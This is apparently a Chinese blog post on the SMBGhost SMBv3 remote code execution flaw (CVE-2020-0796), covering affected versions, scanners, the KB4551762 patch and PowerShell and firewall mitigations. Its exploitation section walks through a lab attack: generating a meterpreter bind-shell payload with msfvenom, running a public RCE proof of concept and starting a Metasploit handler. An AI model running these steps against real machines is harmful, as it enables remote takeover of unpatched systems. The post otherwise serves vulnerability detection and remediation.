SMB漏洞修复

已于 2024-03-11 15:52:02 修改
阅读量1.3k 收藏 11
点赞数 25
分类专栏: Windows服务安全配置 文章标签: 服务器 全文检索 windows 网络
于 2024-03-11 15:09:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lopowh/article/details/136624573
版权

通告背景

2020311日,某国外安全公司发布了一个近期微软安全补丁包所涉及漏洞的综述,其中谈到了一个威胁等级被标记为CriticalSMB服务远程代码执行漏洞(CVE-2020-0796),攻击者可以利用此漏洞远程无需用户验证通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,从而获取机器的完全控制。此漏洞主要影响支持SMBv3.0的设备,理论上存在蠕虫化的可能性。

漏洞描述

漏洞存在于WindowsSMBv3.0(文件共享与打印服务)中,目前技术细节暂不公布,对于漏洞的利用无需用户验证,通过构造恶意请求即可触发导致任意代码执行,系统受到非授权控制。

影响面评估

此漏洞主要影响SMBv3.0协议,目前支持该协议的设备包括Windows 8Windows 8.1Windows 10Windows Server 2012  Windows Server 2016,但是从微软的通告来看受影响目标主要是Win10系统,考虑到相关设备的数量级,潜在威胁较大。

受影响的Windows操作系统版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)

漏洞检测篇

git 脚本检测:

GitHub - ly4k/SMBGhost: Scanner for CVE-2020-0796 - SMBv3 RCE
检测返回的数据包中SMB压缩版本,这种检测方式打过补丁依然会误报。

python scanner.py <IP>

奇安信检测工具:

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
适用于局域网批量检测,快速查找未打补丁的机器。

腾讯电脑管家SMB漏洞修复工具:

http://dlied6.qq.com/invc/QQPatch/QuickFix_SMB0796.exe
适用于个人用户检测,一键快速检测和修复。

漏洞利用篇

蓝屏PoC

GitHub - eerykitty/CVE-2020-0796-PoC: PoC for triggering buffer overflow via CVE-2020-0796

使用两台虚拟机作为漏洞演示,一台win10 1903版本,一台是Kali Linux

python3 CVE-2020-0796.py <IP>

本地提权PoC

GitHub - danigargu/CVE-2020-0796: CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost
本地普通用户Bypass执行提权exp后弹出cmd窗口,成功获取system权限。

远程利用PoC

GitHub - chompie1337/SMBGhost_RCE_PoC

漏洞演示过程:

1、使用msfvenom生成payload

msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o evil.py

2、将evil.py 生成的code,替换到exploit.pyUSER_PAYLOAD参数,并把参数buf改为USER_PAYLOAD

root@kali:~# git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git

3、运行exploit.py

python3 exploit.py -ip 192.168.172.128

4、启动msf监听本地端口(PS:监听端口如果一直收不到shell,可重新运行一次。)

msf5 > use exploit/multi/handler

修复方法

1. 补丁

微软已经发布了此漏洞的安全补丁,访问如下链接:
Security Update Guide - Microsoft Security Response Center

方法一:给对应的系统打微软出的最新补丁

系统类型

介绍

下载链接

Windows 10 Version 1903 for 32-bit Systems

KB4551762介绍

下载

Windows 10 Version 1903 for ARM64-based Systems

KB4551762介绍

下载

Windows 10 Version 1903 for x64-based Systems

KB4551762介绍

下载

Windows 10 Version 1909 for 32-bit Systems

KB4551762介绍

下载

Windows 10 Version 1909 for ARM64-based Systems

KB4551762介绍

下载

Windows 10 Version 1909 for x64-based Systems

KB4551762介绍

下载

Windows Server, version 1903 (Server Core installation)

KB4551762介绍

下载

Windows Server, version 1909 (Server Core installation)

KB4551762介绍

下载

2. 临时解决方案

如果暂时无法安装补丁,微软当前建议按如下临时解决方案处理:

方法二:禁用SMBv3压缩
禁用SMB 3.0的压缩功能,是否使用需要结合自己业务进行判断。
使用以下PowerShell命令禁用压缩功能,以阻止未经身份验证的攻击者利用SMBv3 服务器的漏洞。
Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 1 -Force
用户可通过以下PowerShell命令撤销禁用压缩功能
Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 0 -Force
注:利用以上命令进行更改后,无需重启即可生效;该方法仅可用来防护针对SMB服务器(SMB SERVER)的攻击,无法对SMB客户端(SMB Client)进行防护。

方法三:设置防火墙策略关闭相关端口
SMBTCP 445端口
NetBIOS名称解析的UDP 137端口
NetBIOS数据图服务的UDP 138端口
NetBIOS会话服务的TCP 139端口

方法四:通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务
您浏览的页面不存在,请检查页面地址是否正确!

修复

微软目前给出变通方法:禁用SMBv3的压缩功能或在防火墙禁止445端口

PowerShell禁用SMBv3压缩功能:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

PowerShell重新启用SMBv3压缩功能:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 0 -Force

网络异常吗
关注
专栏目录
smb+服务器+修复,Microsoft Windows
weixin_30789921的博客
08-05 868
Microsoft Windows SMB服务器安全更新(4013389)补丁是一款微软官方Microsoft 安全公告 MS17-010 - 严重Microsoft Windows SMB 服务器安全更新 (4013389)勒索病毒修复中文特别补丁,此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中...
linux smb 漏洞_Samba远程代码执行漏洞的实例详解
weixin_34887221的博客
12-23 1442
Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。360网络安全中心 和 360信息安全部的Gear Team第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成...
永恒之蓝 屏蔽135-139、445、3389端口脚本
10-15
针对永恒之蓝漏洞,自动导入IP安全策略的脚本屏蔽135-139、445、3389端口,对脚本进行优化,解决了以管理员权限运行脚本时,默认路径是"C:\Windows\system32>" 导致命令找不到策略文件,导入策略失败的问题。 同时加了暂停,方便用户查看导入过程中是否有错误提示。
授权访问漏洞(及其修复方法)---看这一篇就够!!
最新发布
C233333235的博客
08-05 3847
Redis 默认情况下,会绑定在 0.0.0.0:6379 ,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下授权Redis 以及读取 Redis 的数据。
XP SMB服务漏洞MS17-010 勒索病毒(WannaCry UIWIX)补丁
05-18
windows XP三种语言(简体 ,繁体和英文)的漏洞补丁,专门针对目前流行的勒索病毒(WannaCry UIWIX),修复windows系统的 SMB服务漏洞MS17-010
授权访问漏洞
C233333235的博客
08-04 1078
Redis 默认情况下,会绑定在,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下授权Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利⽤ Redis ⾃身的提供的config 命令,可以进⾏写⽂件操作,攻击者可以成功将⾃⼰的ssh公钥写⼊⽬标服务器的/root/.ssh ⽂件夹的。
smb+服务器+修复,samba修复
weixin_29271263的博客
08-05 609
在之前有讲过一个samba无法连接的情况,这次碰到的是samba依赖被弄坏后还原。注:可能不是很详细,因为时间原因,可能不够完整或缺少记录和截图。 作为记录和参考。问题:因为对ubuntu系统不太了解,使用服务器的同事 直接百度执行了某些命令导致 很多依赖被改变,samba无法连接。解决:1.目前服务器主要功能是编译、访问。尝试了下编译,编译OK,相关环境没坏。ssh访问也正常。如果都出问题 可能...
Windows服务器关于SMB签名配置的漏洞处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-24 4070
SMB签名旨在帮助提高SMB协议的安全性,为了防止在传输过程中修改SMB数据包,SMB协议支持SMB数据包的数字签名。要利用SMB数据包签名,通信中涉及的客户端SMB组件和服务器SMB组件必须启用或需要SMB数据包签名。当启用SMB签名时,SMB将停止使用RDMA远程直接数据存取,因为最大MTU限制为1,394字节,这会导致邮件碎片和重组,并降低整体性能。SMB签名配置漏洞是指远程SMB服务器配置需要签名,这将导致经身份验证的远程攻击者可以利用此漏洞SMB服务器进行中间人攻击。...
smb 服务器 修复,我的samba服务处于maintenance模式,怎么修复
weixin_34977480的博客
08-10 405
我的samba服务处于maintenance模式,怎么修复?(2011-12-24 00:11:46)标签:修复杂谈我的samba服务处于maintenance模式,怎么修复?大家好,我的samba服务不知道怎么就处于maintenance模式了,大家帮我看看呀这是我的smb.confnetbios name = sambaworkgroup = WORKGROUPserver string = ...
永恒之蓝漏洞修复工具
06-30
压缩包中的"Windows永恒之蓝漏洞修复工具"很可能包含了上述修复步骤的自动化工具,它可以自动检查系统状态,安装必要的补丁,并可能包含额外的防护措施。使用这样的工具可以简化修复过程,但使用前应确保工具来源...
永恒之蓝ms17_010漏洞复现
m0_73005107的博客
11-28 1460
永恒之蓝漏洞复现
授权访问漏洞原理以及修复方法
it知识分享 free for nothing..
12-20 5018
授权访问漏洞 原理以及修复方法
smb+服务器+修复,关于SMBv3.0服务远程代码执行漏洞的风险提示及修复方法
weixin_34378986的博客
08-05 1778
一、漏洞概述2020年3月10日,微软官方发布了针对Windows 10/Server禁用SMBv3(SMB 3.1.1版本)协议压缩的指南公告,以此缓解SMBv3协议(用于文件共享与打印服务)在处理调用请求时的一个远程代码执行漏洞(漏洞编号CVE-2020-0796)。SMBv3协议同时启用于SMB服务端和SMB客户端,经身份验证的攻击者可以对服务端和客户端分别进行攻击,通过向受影响的SMBv...
授权漏洞
qq_39541626的博客
03-16 1558
https://www.cnblogs.com/KevinGeorge/p/8921133.html 访问控制类漏洞与隐患 这一类漏洞与隐患属于访问控制与身份鉴别问题,一般有没有配置访问控制、访问控制弱(弱口令或者空口令),身份鉴别可以绕过等问题 漏洞协议组件 漏洞类型 漏洞评级 SSH 弱口令 严重 RDP 授权、弱口令 严重 SMB 授权(共享直接访问,不验证)、弱口令 严...
SMB服务远程代码执行漏洞(CVE-2020-0796)加固指南
乐大厨串串香飘万里
10-24 3047
1SMB服务远程代码执行漏洞(CVE-2020-0796)高Windows
用户应火速更新 Samba 服务器 修复密码重置和 DoS 漏洞
iqifenxia的博客
01-03 307
     Samba 维护人员刚刚发布新版本以解决两个严重的漏洞。这些漏洞可导致非权限远程攻击者对服务器发动 DoS 攻击并更改其它用户包括管理员用户在内的密码。   Samba 是一款开源软件,运行在当前多数操作系统上,包括 Windows、Linux、UNIX、IBM System 390 和 OpenVMS。   Samba 允许非 Windows 操作系统如 GNU/Linux 或 Mac OS X 和 Windows 操作系统分享网络共享文件夹、文件和打印机。   DoS 漏洞   
linux samba 不安全,Samba 不安全权限授权访问漏洞(CVE-2013-1863)
weixin_34024555的博客
05-16 689
发布日期:2013-03-20更新日期:2013-03-21受影响系统:Samba Samba 4.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 58596CVE(CAN) ID: CVE-2013-1863Samba是一套实现SMB(Server M...
linux smb 漏洞_Linux 系统中这样修复 SambaCry 漏洞 ...
weixin_39628271的博客
12-23 554
漏洞过时和修补的系统容易受到远程代码执行漏洞的攻击。简单来说,这意味着访问可写共享的人可以上传一段任意代码,并使用服务器中的 root 权限执行该代码。这个问题在 Samba 网站上被描述为 CVE-2017-7494,并且已知会影响 Samba v3.5(2010 年 3 月初发布)及以后版本。由于与 WannaCry 有相似之处,它被非官方地被命名为 SambaCry:它们均针对 SMB ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值